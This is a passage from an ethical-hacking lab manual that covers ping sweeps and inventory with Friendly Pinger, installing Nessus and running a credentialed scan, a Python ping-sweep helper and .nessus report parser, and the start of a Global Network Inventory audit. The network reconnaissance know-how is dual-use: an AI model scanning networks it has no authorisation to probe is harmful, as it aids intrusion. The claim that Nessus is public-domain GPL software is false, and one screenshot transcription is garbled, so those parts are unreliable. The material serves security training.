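    as the dialog warns, can miss slow hosts.  Linux ping takes -W in seconds."""
    if sys.platform.startswith("win"):
        cmd = ["ping", "-n", "1", "-w", str(timeout_ms), ip]
    else:
        cmd = ["ping", "-c", "1", "-W", str(max(1, timeout_ms // 1000)), ip]
    try:
        done = subprocess.run(cmd, stdout=subprocess.DEVNULL,
                              stderr=subprocess.DEVNULL,
                              timeout=timeout_ms / 1000 + 2)
    except (OSError, subprocess.TimeoutExpired):
        return False
    return done.returncode == 0


def sweep(spec, probe=ping_probe, max_workers=32):
    """Probe every address of the range concurrently ("ping of all devices in
    parallel at once") and return the responsive ones in range order.
    probe(ip) -> bool is injectable so the sweep can be exercised offline."""
    addrs = expand_range(spec)
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        alive = list(pool.map(probe, addrs))
    return [ip for ip, up in zip(addrs, alive) if up]


def diff_maps(previous, current):
    """Report devices that appeared or vanished between two sweeps; this is
    how new devices and modifications to the topology show up over time."""
    prev, cur = set(previous), set(current)
    return {"new": sorted(cur - prev, key=ipaddress.IPv4Address),
            "gone": sorted(prev - cur, key=ipaddress.IPv4Address)}


if __name__ == "__main__":
    # Constructed offline demo: pretend the four hosts the lab found answer.
    live = {"10.0.0.2", "10.0.0.3", "10.0.0.5", "10.0.0.7"}
    found = sweep("10.0.0.1-20", probe=lambda ip: ip in live)
    print("responsive:", found)
    print("changes since last map:", diff_maps(["10.0.0.2", "10.0.0.3"], found))
```

Swap the constructed probe for ping_probe to run a real sweep of your own lab range; the range parser and the diff work the same either way.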


[Screenshot: Wizard results list]

IP address    Name
☑ 10.0.0.2    WIN-MSSELCK4K41
☑ 10.0.0.3    Windows8
☑ 10.0.0.5    WIN-LXQN3WR3R9M
□ 10.0.0.7    WIN-D39MR5HL9E4

The inquiry is completed. 4 devices found. Remove tick from devices which you don't want to add on the map.

Press CTRL+I to get more information about the created map. You will see your name as the map author in the appeared dialog window.

FIGURE 9.6: FPinger Scanning of Address completed

11. Set the default options in the Wizard selection windows and click Next

Ping verifies a connection to a remote host by sending an ICMP (Internet Control Message Protocol) ECHO packet to the host and listening for an ECHO REPLY packet. A message is always sent to an IP address. If you do not specify an address but a hostname, this hostname is resolved to an IP address using your default DNS server. In this case you're vulnerable to a possible invalid entry on your DNS (Domain Name Server) server.

[Screenshot: Wizard dialog. Devices type: Workstation. Address: Use IP-address / Use DNS-name (selected). Name: Remove DNS suffix. Addition: Add devices to the new map / Add devices to the current map (selected). Help / Next / Cancel]

FIGURE 9.7: FPinger selecting the Devices type

12. Then the client area will display the Network map in the FPinger window


[Screenshot: Friendly Pinger [Default.map] window showing the discovered network map in the client area]

If you want to ping inside the network, behind the firewall, there will be no problems. If you want to ping other networks behind the firewall, it must be configured to let the ICMP packets pass through. Your network administrator should do it for you. Same with the proxy server.

FIGURE 9.8: FPinger Client area with Network architecture

13. To scan the selected computer in the network, select the computer, select the Scan tab from the menu bar, and click Scan

You may download the latest release: http://www.kilievich.com/fpinger

[Screenshot: Friendly Pinger [Default.map] window with the Scan menu open]

FIGURE 9.9: FPinger Scanning the computers in the Network

Select File | Options, and configure Friendly Pinger to your taste.

14. It displays scanned details in the Scanning wizard


[Screenshot: Scanning dialog]

Service   Computer          Command
HTTP      WIN-MSSELCK...    http://WIN-MSSELCK4K41
HTTP      WIN-D39MR5H...    http://WIN-D39MR5HL9E4

Scanning complete. Help / OK / Cancel / Rescan

Double-click the device to open it in Explorer.

FIGURE 9.10: FPinger Scanned results

15. Click the Inventory tab from the menu bar to view the configuration details of the selected computer

Audit software and hardware components installed on the computers over the network.

Tracking user access and files opened on your computer via the network.

[Screenshot: Friendly Pinger [Default.map] window with the Inventory menu open: Inventory, Options... Ctrl-F9]

FIGURE 9.11: FPinger Inventory tab

16. The General tab of the Inventory wizard shows the computer name and installed operating system


[Screenshot: Inventory window, General tab for WIN-D39MR5HL9E4]

Computer/User
Host name: WIN-D39MR5HL9E4
User name: Administrator

Windows
Name: Windows Server 2012 Release Candidate Datacenter
Service pack:

Collection time
Collection time: 8/22/2012 11:22:34 AM

Assignment of external commands (like telnet, tracert, net.exe) to devices.

FIGURE 9.12: FPinger Inventory wizard General tab

17. The Misc tab shows the Network IP addresses, MAC addresses, File System, and Size of the disks

Search of HTTP, FTP, e-mail and other network services.

[Screenshot: Inventory window, Misc tab for WIN-D39MR5HL9E4]

Network
IP addresses: 10.0.0.7
MAC addresses: D4-BE-D9-C3-CE-2D
Total space: 465.42 Gb
Free space: 382.12 Gb

Display settings
Display settings: 1366x768, 60 Hz, True Color (32 bit)

Disk   Type    Free, Gb   Size, Gb   Used, %   File System
C      Fixed   15.73      97.31      84        NTFS
D      Fixed   96.10      97.66      2         NTFS

Function "Create Setup" allows to create a lite freeware version with your maps and settings.

FIGURE 9.13: FPinger Inventory wizard Misc tab

18. The Hardware tab shows the hardware component details of your networked computers


[Screenshot: Inventory window, Hardware tab for WIN-D39MR5HL9E4]

4x Intel Pentium III Xeon 3093
Memory: 4096 Mb
BIOS: AT/AT COMPATIBLE DELL - 6222004 02/09/12
Monitors: Generic PnP Monitor
Display adapters: Intel(R) HD Graphics Family
Disk drives: ST3500413AS (Serial: W2A91RH6)
Network adapters: @netrt630x64.inf,%rtl8168e.devicedesc%;Realtek PCIe GBE Family Controller
SCSI and RAID controllers: @spaceport.inf,%spaceport_devicedesc%;Microsoft Storage Spaces Controller

FIGURE 9.14: FPinger Inventory wizard Hardware tab

19. The Software tab shows the installed software on the computers

[Screenshot: Inventory window, Software tab for WIN-D39MR5HL9E4]

Adobe Reader X (10.1.3)
eMailTrackerPro
EPSON USB Display
Friendly Pinger
Intel(R) Processor Graphics
Java(TM) 6 Update 17
Microsoft .NET Framework 4 Multi-Targeting Pack
Microsoft Application Error Reporting
Microsoft Office Excel MUI (English) 2010
Microsoft Office OneNote MUI (English) 2010
Microsoft Office Outlook MUI (English) 2010
Microsoft Office PowerPoint MUI (English) 2010
Microsoft Office Proof (English) 2010
Microsoft Office Proof (French) 2010
Microsoft Office Proof (Spanish) 2010

Details: Name, Version, Developer, Homepage

Visualization of your computer network as a beautiful animated screen.

FIGURE 9.15: FPinger Inventory wizard Software tab

Lab Analysis

Document all the IP addresses, open and closed ports, services, and protocols you discovered during the lab.


Tool/Utility      Information Collected/Objectives Achieved

Friendly Pinger   IP address: 10.0.0.1 - 10.0.0.20

                  Found IP address:
                  ■ 10.0.0.2
                  ■ 10.0.0.3
                  ■ 10.0.0.5
                  ■ 10.0.0.7

                  Details Result of 10.0.0.7:
                  ■ Computer name
                  ■ Operating system
                  ■ IP Address
                  ■ MAC address
                  ■ File system
                  ■ Size of disk
                  ■ Hardware information
                  ■ Software information

YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Does FPinger support proxy servers and firewalls?

2. Examine the programming language used in FPinger.

Internet Connection Required

□ Yes ☑ No

Platform Supported

☑ Classroom ☑ iLabs


Lab

Scanning a Network Using the Nessus Tool

Nessus allows you to remotely audit a network and determine if it has been broken into or misused in some way. It also provides the ability to locally audit a specific machine for vulnerabilities.

Lab Scenario

In the previous lab, you learned to use Friendly Pinger to monitor network devices, receive server notifications and ping information, track user access via the network, view graphical trace routes, etc. Once attackers have the information related to network devices, they can use it as an entry point to a network for a comprehensive attack and perform many types of attacks ranging from DoS attacks to unauthorized administrative access. If attackers are able to get traceroute information, they might use a methodology such as firewalking to determine the services that are allowed through a firewall.

If an attacker gains physical access to a switch or other network device, he or she will be able to successfully install a rogue network device; therefore, as an administrator, you should disable unused ports in the configuration of the device. Also, it is very important that you use some methodologies to detect such rogue devices on the network.

As an expert ethical hacker and penetration tester, you must understand how vulnerabilities, compliance specifications, and content policy violations are scanned using the Nessus tool.

Lab Objectives

This lab will give you experience in scanning the network for vulnerabilities, and show you how to use Nessus. It will teach you how to:

■ Use the Nessus tool

■ Scan the network for vulnerabilities


Lab Environment

To carry out the lab, you need:

■ Nessus, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Vulnerability Scanning Tools\Nessus

■ You can also download the latest version of Nessus from the link http://www.tenable.com/products/nessus/nessus-download-agreement

■ If you decide to download the latest version, then screenshots shown in the lab might differ

■ A computer running Windows Server 2012

■ A web browser with Internet access

■ Administrative privileges to run the Nessus tool

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Duration

Time: 20 Minutes

Overview of Nessus Tool

Nessus is public domain software released under the GPL.

Nessus helps students to learn, understand, and determine vulnerabilities and weaknesses of a system and network in order to know how a system can be exploited. Network vulnerabilities can be network topology and OS vulnerabilities, open ports and running services, application and service configuration errors, and application and service vulnerabilities.

Lab Tasks

TASK 1: Nessus Installation

1. To install Nessus, navigate to D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Vulnerability Scanning Tools\Nessus

2. Double-click the Nessus-5.0.1-x86_64.msi file.

3. The Open File - Security Warning window appears; click Run

Nessus is designed to automate the testing and discovery of known security problems.

[Screenshot: Open File - Security Warning dialog. Do you want to run this file? Publisher: Tenable Network Security Inc. Type: Windows Installer Package. Run / Cancel. Always ask before opening this file. While files from the Internet can be useful, this file type can potentially harm your computer. Only run software from publishers you trust. What's the risk?]

FIGURE 10.1: Open File - Security Warning


4. The Nessus - InstallShield Wizard appears. During the installation process, the wizard prompts you for some basic information. Follow the instructions. Click Next.

The updated Nessus security checks database can be retrieved with the command nessus-update-plugins.

[Screenshot: Tenable Nessus (x64) - InstallShield Wizard. Welcome to the InstallShield Wizard for Tenable Nessus (x64). The InstallShield(R) Wizard will install Tenable Nessus (x64) on your computer. To continue, click Next. WARNING: This program is protected by copyright law and international treaties. Back / Next / Cancel]

FIGURE 10.2: The Nessus installation window

5. Before you begin installation, you must agree to the license agreement as shown in the following figure.

6. Select the radio button to accept the license agreement and click Next.

Nessus has the ability to test SSLized services such as http, smtps, imaps and more.

Nessus security scanner includes NASL (Nessus Attack Scripting Language).

[Screenshot: Tenable Nessus (x64) - InstallShield Wizard, License Agreement page. Please read the following license agreement carefully. Tenable Network Security, Inc. NESSUS Software License Agreement. Radio buttons: I accept the terms in the license agreement / I do not accept the terms in the license agreement. Print / Back / Next / Cancel]

FIGURE 10.3: The Nessus Install Shield Wizard

7. Select a destination folder and click Next.


[Screenshot: Tenable Nessus (x64) - InstallShield Wizard, Destination Folder page. Click Next to install to this folder, or click Change to install to a different folder. Install Tenable Nessus (x64) to: C:\Program Files\Tenable\Nessus\ Change... Back / Next / Cancel]

Nessus gives you the choice of performing regular nondestructive security audits on a routine basis.

FIGURE 10.4: The Nessus Install Shield Wizard

8. The wizard prompts for Setup Type. With the Complete option, all program features will be installed. Check Complete and click Next.

Nessus probes a range of addresses on a network to determine which hosts are alive.

[Screenshot: Tenable Nessus (x64) - InstallShield Wizard, Setup Type page. Choose the setup type that best suits your needs.]

FIGURE 10.5: The Nessus Install Shield Wizard for Setup Type

9. The Nessus wizard will prompt you to confirm the installation. Click Install


[Screenshot: Tenable Nessus (x64) - InstallShield Wizard, Ready to Install the Program page. The wizard is ready to begin installation. Click Install to begin the installation. If you want to review or change any of your installation settings, click Back. Click Cancel to exit the wizard. Back / Install / Cancel]

Nessus probes network services on each host to obtain banners that contain software and OS version information.

FIGURE 10.6: Nessus InstallShield Wizard

10. Once installation is complete, click Finish.

Path of the Nessus home directory for Windows: \Program Files\Tenable\Nessus

[Screenshot: Tenable Nessus (x64) - InstallShield Wizard, InstallShield Wizard Completed page. The InstallShield Wizard has successfully installed Tenable Nessus (x64). Click Finish to exit the wizard.]

FIGURE 10.7: Nessus Install Shield wizard

Nessus Major Directories

■ The major directories of Nessus are shown in the following table.


Nessus Home Directory             Nessus Sub-Directories            Purpose

Windows                           \conf                             Configuration files
\Program Files\Tenable\Nessus     \data                             Stylesheet templates
                                  \nessus\plugins                   Nessus plugins
                                  \nessus\users\<username>\kbs      User knowledgebase saved on disk
                                  \nessus\logs                      Nessus log files

TABLE 10.1: Nessus Major Directories

During the installation and daily operation of Nessus, manipulating the Nessus service is generally not required.

11. After installation, Nessus opens in your default browser.

12. The Welcome to Nessus screen appears; click the here link to connect via SSL

[Screenshot: Welcome to Nessus! Please connect via SSL by clicking here. You are likely to get a security alert from your web browser saying that the SSL certificate is invalid. You may either choose to temporarily accept the risk, or can obtain a valid SSL certificate from a registrar. Please refer to the Nessus documentation for more information.]

FIGURE 10.8: Nessus SSL certification

13. Click OK in the Security Alert pop-up, if it appears

The Nessus Server Manager used in Nessus 4 has been deprecated.

[Screenshot: Security Alert dialog. You are about to view pages over a secure connection. Any information you exchange with this site cannot be viewed by anyone else on the web. In the future, do not show this warning. OK / More Info]

FIGURE 10.9: Internet Explorer Security Alert

14. Click the Continue to this website (not recommended) link to continue


[Screenshot: Internet Explorer "Certificate Error: Navigation Blocked" page. There is a problem with this website's security certificate. The security certificate presented by this website was not issued by a trusted certificate authority. The security certificate presented by this website was issued for a different website's address. Security certificate problems may indicate an attempt to fool you or intercept any data you send to the server. We recommend that you close this webpage and do not continue to this website. Click here to close this webpage. Continue to this website (not recommended). More information]

FIGURE 10.10: Internet Explorer website's security certificate

15. Click OK in the Security Alert pop-up, if it appears.

Due to the technical implementation of SSL certificates, it is not possible to ship a certificate with Nessus that would be trusted by browsers.

[Screenshot: Security Alert dialog. You are about to view pages over a secure connection. Any information you exchange with this site cannot be viewed by anyone else on the web. In the future, do not show this warning. OK / More Info]

FIGURE 10.11: Internet Explorer Security Alert

16. The Thank you for installing Nessus screen appears. Click the Get Started > button.

[Screenshot: Welcome to Nessus! Thank you for installing Nessus. Nessus will allow you to perform high-speed vulnerability discovery, to determine which hosts are running which services; compliance checks, to verify and prove that every host on your network adheres to the security policy you define; scan scheduling, to automatically run scans at the frequency you select; and more! Get started >]

Warning: a custom certificate for your organization must be used.

FIGURE 10.11: Nessus Getting Started

17. In Initial Account Setup, enter the credentials given at the time of registration and click Next >


p • o («*•*<‫»*״‬.‫>״‬.e c Wefconeu Neaus

In itia l Account Setup


First, w e need to create an admin user for the scanner. This user will have administrative control on the scanner; the admin has the ability to create/deiete
users, stop ongoing scans, and change the scanner configuration.

loo*n: admin

Confirm P«*Mword:
< Prev | Next > |

Because f/* admin user can change the scanner configuration, the admin has (he ability to execute commands on the remote host. Therefore, It should be
i that the admin user has the same privileges as the *root ‫( ״‬or administrator) user on the remote ho:

FIGURE 10.12: Nessus Initial Account Setup

18. In Plugin Feed Registration, you need to enter the activation code. To obtain an activation code, click the http://www.nessus.org/register/ link.

19. Click the Using Nessus at Home icon in Obtain an Activation Code.

Note: If you are using Tenable SecurityCenter, the Activation Code and plugin updates are managed from SecurityCenter. Nessus needs to be started to be able to communicate with SecurityCenter, which it will normally not do without a valid Activation Code and plugins.

[Screenshot: Tenable Network Security website, "Obtain an Activation Code" page, offering the choices "Using Nessus at Work?" and "Using Nessus at Home?".]

FIGURE 10.13: Nessus Obtaining Activation Code

20. In Nessus for Home, accept the agreement by clicking the Agree button as shown in the following figure.


FIGURE 10.14: Nessus Subscription Agreement

21. Fill in the Register a HomeFeed section to obtain an activation code and click Register.
Note: If you do not register your copy of Nessus, you will not receive any new plugins and will be unable to start the Nessus server.

Note: The Activation Code is not case sensitive.

[Screenshot: Tenable website, "Register a HomeFeed" form. It asks for the email address to which the activation code will be sent (stated not to be shared with any third party), offers a "Check to receive updates from Tenable" box, and has a Register button.]
FIGURE 10.15: Nessus Registering HomeFeed

22. The Thank You for Registering window appears for the Tenable Nessus HomeFeed.


[Screenshot: Tenable website, "Thank You for Registering!" page. Text: "Thank you for registering your Tenable Nessus HomeFeed. An email containing your activation code has just been sent to you at the email address you provided. Please note that the Tenable Nessus HomeFeed is available for home use only. If you want to use Nessus at your place of business, you must purchase the Nessus ProfessionalFeed. Alternately, you may purchase a subscription to the Nessus Perimeter Service and scan in the cloud. The Nessus Perimeter Service does not require any software download."]

FIGURE 10.16: Nessus Registration Completed

Note: After the initial registration, Nessus will download and compile the plugins obtained from port 443 of plugins.nessus.org or plugins-customers.nessus.org.

23. Now log in to your email for the activation code provided at the time of registration, as shown in the following figure.

[Screenshot: webmail inbox showing the "Tenable HomeFeed Activation Code" message; the body contains the activation code and instructions for using it with Nessus.]
FIGURE 10.17: Nessus Registration mail

24. Now enter the activation code received at your email address and click Next.

[Screenshot: Nessus web UI, Plugin Feed Registration. Dialog text: "As information about new vulnerabilities is discovered and released into the public domain, Tenable's research staff designs programs ("plugins") that enable Nessus to detect their presence. The plugins contain vulnerability information, the algorithm to test for the presence of the security issue, and a set of remediation actions. To use Nessus, you need to subscribe to a "Plugin Feed". You can do so by visiting http://www.nessus.org/register/ to obtain an Activation Code." Options listed: to use Nessus at your workplace, purchase a commercial ProfessionalFeed; to use Nessus in a non-commercial home environment, you can get a HomeFeed for free; Tenable SecurityCenter users enter 'SecurityCenter' in the field below; to perform offline plugin updates, enter 'offline' in the field below. Field: "Please enter your Activation Code:" (filled with the code from the registration email). Optional Proxy Settings. Buttons < Prev | Next >.]

Note: Once the plugins have been downloaded and compiled, the Nessus GUI will initialize and the Nessus server will start.

FIGURE 10.18: Nessus Applying Activation Code

25. The Registering window appears as shown in the following screenshot.

[Screenshot: Nessus web UI, "Registering..." dialog: "Registering the scanner with Tenable..."]

FIGURE 10.19: Nessus Registering Activation Code

26. After successful registration, click Next: Download plugins > to download the Nessus plugins.

Note: Nessus server configuration is managed via the GUI. The nessusd.conf file is deprecated. In addition, proxy settings, subscription feed registration, and offline updates are managed via the GUI.

[Screenshot: Nessus web UI, "Registering..." dialog: "Successfully registered the scanner with Tenable. Successfully created the user." with a Next: Download plugins > button.]

FIGURE 10.20: Nessus Downloading Plugins

27. Nessus now fetches the plugin set and installs it. Downloading, compiling and initializing the plugins takes some time.

[Dialog text: "Nessus is fetching the newest plugin set. Please wait..."]

FIGURE 10.21: Nessus fetching the newest plugin set

28. The Nessus Log In page appears. Enter the Username and Password of the admin user you created in Initial Account Setup (step 17) and click Log In.


TASK 2: Network Scan Vulnerabilities

Note: For the item SSH user name, enter the name of the account that is dedicated to Nessus on each of the scan target systems.

[Screenshot: Nessus Log In screen.]

FIGURE 10.22: The Nessus Log In screen

29. The Nessus HomeFeed window appears. Click OK.


FIGURE 10.23: Nessus HomeFeed subscription

30. After you successfully log in, the Nessus Daemon window appears as shown in the following screenshot.

Note: To add a new policy, click Policies -> Add Policy.

FIGURE 10.24: The Nessus main screen

31. If you have an Administrator Role, you can see the Users tab, which lists all Users, their Roles, and their Last Logins.


Note: The credentials a new policy uses are configured on its Credentials tab.

FIGURE 10.25: The Nessus administrator view

32. To add a new policy, click Policies -> Add Policy. Fill in the General policy sections, namely Basic, Scan, Network Congestion, Port Scanners, Port Scan Options, and Performance.

WARNING: Any changes to the Nessus scanner configuration will affect ALL Nessus users. Edit these options carefully.

FIGURE 10.26: Adding Policies

33. To configure the credentials of the new policy, click the Credentials tab shown in the left pane of Add Policy.


Note: The most effective credentialed scans are those for which the supplied credentials have root privileges. Use an account dedicated to scanning and guard its password: the scanner stores these credentials in the policy and presents them to every target in scope.

FIGURE 10.27: Adding Policies and setting Credentials

34. To select the required plugins, click the Plugins tab in the left pane of Add Policy.

Note: If you are using Kerberos, you must configure the Nessus scanner to authenticate to a KDC.

[Screenshot: Nessus Add Policy, Plugins tab, listing plugin families (for example General, Gentoo Local Security Checks, HP-UX Local Security Checks, Juniper Local Security Checks) on the left and the individual plugins of the selected family on the right, each with an enable/disable switch.]

FIGURE 10.28: Adding Policies and selecting Plugins

35. To configure preferences, click the Preferences tab in the left pane of Add Policy.

36. In the Plugin field, select Database settings from the drop-down list.

37. Enter the Login and Password of the database account Nessus should use (in this lab, the credentials given at the time of registration).

38. Give the Database SID: 4587, Database port to use: 124, and select Oracle auth type: SYSDBA. (These are the lab's example values; against a real database, enter the SID and listener port actually in use, and prefer a dedicated read-only audit account over SYSDBA wherever the checks allow it.)

39. Click Submit.

Note: If the policy is successfully added, the Nessus server displays a confirmation message.

Note: Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks.

FIGURE 10.29: Adding Policies and setting Preferences

40. The message Policy "NetworkScan_Policy" was successfully added is displayed as shown below.

FIGURE 10.30: The NetworkScan Policy

Note: To set up a scan, input the field name, type, policy, scan target, and target file.

41. Now, click Scans -> Add to open the Add Scan window.

42. Input the fields Name, Type, Policy, and Scan Target.

43. In Scan Targets, enter the IP address of your network; here in this lab we are scanning 10.0.0.2. Scan only hosts you are authorized to test.

44. Click Launch Scan at the bottom-right of the window.

Note: The IP addresses may differ in your lab environment.


Note: Nessus has the ability to save configured scan policies, network targets, and reports as a .nessus file.

FIGURE 10.31: Add Scan

45. The scan launches and starts scanning the network.

FIGURE 10.32: Scanning in progress


46. After the scan is complete, click the Reports tab.

FIGURE 10.33: Nessus Reports tab

47. Double-click Local Network to view the detailed scan report.
FIGURE 10.34: Report of the scanned target


48. Double-click any result to display a more detailed synopsis, description, security level, and solution.

Note: If you are manually creating "nessusrc" files, there are several parameters that can be configured to specify SSH authentication.

FIGURE 10.35: Report of a scanned target

49. Click the Download Report button in the left pane.

50. You can download the available reports with a .nessus extension from the drop-down list.

[Screenshot: Download Report dialog. Download Format: .nessus; Chapters: "Chapter Selection Not Allowed"; buttons Cancel / Submit.]

Note: To stop the Nessus server, go to the Nessus Server Manager and click the Stop Nessus Server button.

FIGURE 10.36: Download Report with .nessus extension

51. Now, click Log out.

52. In the Nessus Server Manager, click Stop Nessus Server.

FIGURE 10.37: Log out Nessus
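Once the .nessus file from step 50 is on disk, its findings can be tabulated for the lab write-up without reopening the GUI. The script below is an added example for this section, not part of the Nessus product or of the original lab: it parses the NessusClientData_v2 XML that Nessus exports, counts findings per host and severity, and lists the remediable ones worst first. The embedded report is a constructed, cut-down sample with made-up plugin IDs and finding names; only the element and attribute names follow the real format.

```python
"""Summarize a Nessus v2 (.nessus) report outside the Nessus GUI.

Added example for the lab write-up. SAMPLE_NESSUS is a constructed,
cut-down .nessus file with made-up plugin IDs and finding names, not real
scanner output; only the element and attribute names follow the real
NessusClientData_v2 format.
"""
import xml.etree.ElementTree as ET
from collections import Counter, defaultdict

# Nessus severity attribute: 0..4
SEVERITY_LABELS = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
  <Policy><policyName>NetworkScan_Policy</policyName></Policy>
  <Report name="Local Network">
    <ReportHost name="10.0.0.2">
      <HostProperties>
        <tag name="host-ip">10.0.0.2</tag>
        <tag name="operating-system">Windows Server 2008 (constructed)</tag>
      </HostProperties>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="3"
                  pluginID="900001" pluginName="Constructed finding: SMB service weakness"
                  pluginFamily="Windows">
        <risk_factor>High</risk_factor>
        <synopsis>Constructed synopsis.</synopsis>
        <solution>Apply the vendor patch (constructed).</solution>
      </ReportItem>
      <ReportItem port="80" svc_name="www" protocol="tcp" severity="2"
                  pluginID="900002" pluginName="Constructed finding: web server banner disclosure"
                  pluginFamily="Web Servers">
        <risk_factor>Medium</risk_factor>
        <solution>Suppress the Server header (constructed).</solution>
      </ReportItem>
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                  pluginID="900003" pluginName="Constructed finding: OS identification"
                  pluginFamily="General">
        <risk_factor>None</risk_factor>
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""


def parse_nessus(xml_text):
    """Return one dict per ReportItem: host, OS, port/protocol, severity, plugin, solution."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        # HostProperties/tag elements carry per-host facts such as the detected OS.
        props = {tag.get("name"): (tag.text or "") for tag in host.iter("tag")}
        for item in host.iter("ReportItem"):
            findings.append({
                "host": host.get("name"),
                "os": props.get("operating-system", "unknown"),
                "port": int(item.get("port", "0")),
                "protocol": item.get("protocol", ""),
                "service": item.get("svc_name", ""),
                "severity": int(item.get("severity", "0")),
                "plugin_id": item.get("pluginID", ""),
                "plugin_name": item.get("pluginName", ""),
                "solution": (item.findtext("solution") or "").strip(),
            })
    return findings


def severity_counts(findings, min_severity=0):
    """Findings per host and severity label, ignoring anything below min_severity."""
    counts = defaultdict(Counter)
    for f in findings:
        if f["severity"] >= min_severity:
            counts[f["host"]][SEVERITY_LABELS[f["severity"]]] += 1
    return {host: dict(c) for host, c in counts.items()}


def actionable(findings, min_severity=2):
    """Medium-and-above findings that carry a solution, sorted worst first."""
    rows = [f for f in findings if f["severity"] >= min_severity and f["solution"]]
    return sorted(rows, key=lambda f: (-f["severity"], f["host"], f["port"]))


if __name__ == "__main__":
    found = parse_nessus(SAMPLE_NESSUS)
    print(severity_counts(found))
    for f in actionable(found):
        print(f"{f['host']}:{f['port']}/{f['protocol']} [{SEVERITY_LABELS[f['severity']]}] "
              f"plugin {f['plugin_id']} {f['plugin_name']} -> {f['solution']}")
```

Run it as a script to see the summary, or pass the text of a real download to parse_nessus(). The severity attribute is the 0-4 scale Nessus uses, and pluginID is the value to cite when a finding needs follow-up with the target's owner.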

Lab Analysis

Document all the results and reports gathered during the lab.


Tool/Utility   Information Collected/Objectives Achieved

Nessus         Scan Target Machine: Local Host
               Performed Scan Policy: Network Scan Policy
               Target IP Address: 10.0.0.2
               Result: Local Host vulnerabilities

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Evaluate the OS platforms that Nessus has builds for. Evaluate whether Nessus works with SecurityCenter.

2. Determine how the Nessus license works in a VM (Virtual Machine) environment.

Internet Connection Required

[x] Yes    [ ] No

Platform Supported

[x] Classroom    [ ] iLabs


Auditing Scanning by using Global Network Inventory

Global Network Inventory is used as an audit scanner in zero-deployment and agent-free environments. It scans computers by IP range, domain, single computers, or computers defined by the Global Network Inventory host file.
knowledge

Lab Scenario

With the development of network technologies and applications, network attacks are increasing greatly in both number and severity. Attackers always look for service vulnerabilities and application vulnerabilities on a network or its servers. If an attacker finds a flaw or loophole in a service exposed to the Internet, the attacker will immediately use it to compromise the entire system and any data found there, and from that foothold can compromise other systems on the network. Similarly, if the attacker finds a workstation with administrative privileges whose applications have faults, they can execute arbitrary code or implant viruses to intensify the damage to the network.

As a key technique in the network security domain, intrusion detection systems (IDSes) play a vital role in detecting various kinds of attacks and securing networks. As an administrator, you should make sure that services do not run as the root user, and should keep up with patches and updates for applications from vendors or security organizations such as CERT and CVE. Safeguards can be implemented so that email client software does not automatically open or execute attachments. In this lab, you will learn how networks are scanned using the Global Network Inventory tool.

Lab Objectives

This lab will show you how networks can be scanned and how to use Global Network Inventory. It will teach you how to:

■ Use the Global Network Inventory tool


Lab Environment

To carry out the lab, you need:

■ The Global Network Inventory tool, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\Global Network Inventory Scanner

■ You can also download the latest version of Global Network Inventory from this link: http://www.magnetosoft.com/products/global_network_inventory/gni_features.htm

■ If you decide to download the latest version, the screenshots shown in the lab might differ

■ A computer running Windows Server 2012 as attacker (host machine)

■ Another computer running Windows Server 2008 as victim (virtual machine)

■ A web browser with Internet access

■ Follow the wizard-driven installation steps to install Global Network Inventory

■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes

Overview of Global Network Inventory

Global Network Inventory is an agentless audit and inventory scanner used for security auditing of the hosts on a network. It authenticates to each computer it can reach over an IP range, a domain, or a host list and collects hardware, operating system, service, user, share, hotfix and other configuration details from it.

Lab Tasks

TASK 1: Scanning the network

1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

FIGURE 11.1: Windows Server 2012 - Desktop view

2. Click the Global Network Inventory app to open the Global Network Inventory window.


Note: Scan computers by IP range, by domain, single computers, or computers defined by the Global Network Inventory host file.

[Screenshot: Windows Server 2012 Start screen (Apps view) showing the Global Network Inventory tile among the installed applications.]
FIGURE 112: Windows Server 2012 - Apps

3. The Global Network Inventory main window appears as shown in the following figure.

4. The Tip of the Day window also appears; click Close.

Note: Scan only the items that you need by customizing the scan elements.

FIGURE 11.3 Global Network Inventory Maui Window

5. Turn on the Windows Server 2008 virtual machine from Hyper-V Manager.


Note: Reliable IP detection and identification of network appliances such as network printers, document centers, hubs, and other devices.

FIGURE 11.4: Windows 2008 Virtual Machine

6. Now switch back to the Windows Server 2012 machine; a New Audit Wizard window appears. Click Next (or, in the toolbar, select the Scan tab and click Launch audit wizard).

[Screenshot: New Audit Wizard, Welcome page: "This wizard will guide you through the process of creating a new inventory audit. To continue, click Next." Buttons < Back, Next >, Cancel.]

Note: View scan results, including historic results for all scans, individual machines, or a selected number of addresses.

FIGURE 11.5: Global Network Inventory new audit wizard

7. Select IP range scan and then click Next in the Audit Scan Mode wizard.


[Screenshot: New Audit Wizard, Audit Scan Mode: "To start a new audit scan you must choose the scenario that best fits how you will be using this scan." Options: Single address scan (choose this mode if you want to audit a single computer); IP range scan, selected (audit a group of computers within a single IP range); Domain scan (audit computers that are part of the same domain(s)); Host file scan (audit computers specified in the host file; the most common scenario is to audit a group of computers without auditing an IP range or a domain); Export audit agent (audit computers using a domain login script; an audit agent will be exported to a shared directory and can later be used in the domain login script). Buttons < Back, Next >, Cancel.]

Note: Fully customizable layouts and color schemes on all views and reports.
FIGURE 11.6: Global Network Inventory Audit Scan Mode

8. Set an IP range and then click Next in the IP Range Scan wizard.

Note: Export data to HTML, XML, Microsoft Excel, and text formats.

Note: Licenses are network-based rather than user-based. In addition, extra licenses to cover additional addresses can be purchased at any time if required.

9. In the Authentication Settings wizard, select Connect as, fill in the credentials of your Windows Server 2008 virtual machine, and click Next. Use an account dedicated to the audit with only the rights it needs: the scanner authenticates with these credentials to every host that answers in the range, including any machine you did not expect to find there.


